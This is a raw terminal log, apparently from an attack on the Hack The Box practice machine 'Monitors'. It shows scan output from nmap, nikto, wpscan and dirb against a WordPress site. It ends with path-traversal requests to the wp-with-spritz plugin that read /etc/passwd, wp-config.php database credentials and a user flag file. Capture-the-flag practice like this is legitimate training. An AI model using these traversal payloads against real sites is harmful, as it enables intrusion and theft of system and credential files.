$ nmap -p- -T4 -A 10.10.10.238
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
| 256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_ 256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ echo 10.10.10.238 monitors.htb | sudo tee -a /etc/hosts
$ nikto -h http://monitors.htb
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://monitors.htb/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A WordPress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: WordPress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: WordPress login found
$ wpscan --url http://monitors.htb
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://monitors.htb/xmlrpc.php
| Found By: Link Tag (Passive Detection)
| Confidence: 100%
| Confirmed By: Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://monitors.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://monitors.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://monitors.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
| Found By: Rss Generator (Passive Detection)
| - http://monitors.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
| - http://monitors.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
[+] WordPress theme in use: iconic-one
| Location: http://monitors.htb/wp-content/themes/iconic-one/
| Last Updated: 2020-12-24T00:00:00.000Z
| Readme: http://monitors.htb/wp-content/themes/iconic-one/readme.txt
| [!] The version is out of date, the latest version is 2.1.9
| Style URL: http://monitors.htb/wp-content/themes/iconic-one/style.css?ver=1.7.8
| Style Name: Iconic One
| Style URI: https://themonic.com/iconic-one/
| Description: Iconic One is a premium quality theme with pixel perfect typography and responsiveness and is built ...
| Author: Themonic
| Author URI: https://themonic.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1.7 (80% confidence)
| Found By: Style (Passive Detection)
| - http://monitors.htb/wp-content/themes/iconic-one/style.css?ver=1.7.8, Match: 'Version: 2.1.7'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wp-with-spritz
| Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
| Latest Version: 1.0 (up to date)
| Last Updated: 2015-08-20T20:15:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 4.2.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <====================================================================================================> (137 / 137) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
$ dirb http://monitors.htb
---- Scanning URL: http://monitors.htb/ ----
+ http://monitors.htb/index.php (CODE:301|SIZE:0)
+ http://monitors.htb/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://monitors.htb/wp-admin/
==> DIRECTORY: http://monitors.htb/wp-content/
==> DIRECTORY: http://monitors.htb/wp-includes/
+ http://monitors.htb/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://monitors.htb/wp-admin/ ----
+ http://monitors.htb/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://monitors.htb/wp-admin/css/
==> DIRECTORY: http://monitors.htb/wp-admin/images/
==> DIRECTORY: http://monitors.htb/wp-admin/includes/
+ http://monitors.htb/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://monitors.htb/wp-admin/js/
==> DIRECTORY: http://monitors.htb/wp-admin/maint/
==> DIRECTORY: http://monitors.htb/wp-admin/network/
==> DIRECTORY: http://monitors.htb/wp-admin/user/
---- Entering directory: http://monitors.htb/wp-content/ ----
+ http://monitors.htb/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://monitors.htb/wp-content/languages/
==> DIRECTORY: http://monitors.htb/wp-content/plugins/
==> DIRECTORY: http://monitors.htb/wp-content/themes/
==> DIRECTORY: http://monitors.htb/wp-content/upgrade/
==> DIRECTORY: http://monitors.htb/wp-content/uploads/
---- Entering directory: http://monitors.htb/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://monitors.htb/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://monitors.htb/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://monitors.htb/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://monitors.htb/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://monitors.htb/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://monitors.htb/wp-admin/network/ ----
+ http://monitors.htb/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://monitors.htb/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://monitors.htb/wp-admin/user/ ----
+ http://monitors.htb/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://monitors.htb/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://monitors.htb/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://monitors.htb/wp-content/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://monitors.htb/wp-content/themes/ ----
+ http://monitors.htb/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://monitors.htb/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://monitors.htb/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
$ echo 10.10.10.238 cacti-admin.monitors.htb | sudo tee -a /etc/hosts
plugins: wp-with-spritz
Spritz javaScript SDK version 1.2.2
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec
$ curl http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
root:x:0:0:root:/root:/bin/bash
... ...
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Debian-snmp:x:112:115::/var/lib/snmp:/bin/false
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false
$ curl http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
$ curl http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//home/marcus/user.txt